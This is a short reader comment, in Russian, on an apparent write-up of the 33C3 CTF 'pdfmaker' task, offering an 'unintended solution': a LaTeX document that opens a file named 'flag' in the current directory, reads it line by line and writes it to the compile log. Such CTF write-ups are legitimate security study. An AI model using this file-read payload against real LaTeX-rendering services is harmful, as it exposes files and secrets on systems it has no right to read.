Comments 1
Там ещё был такой unintented solution:
\documentclass{article}
\begin{document}
\makeatletter
\newread\myread
\newcount\linecnt
\openin\myread=.\@currdir%
.\@currdir%
flag
\@whilesw\unless\ifeof\myread\fi{%
\advance\linecnt by \@ne
\readline\myread to \line
\wlog{\line}
}
\makeatother
\end{document}
Sign up to leave a comment.
33C3 CTF Эксплуатируем уязвимость LaTeX'а в задании pdfmaker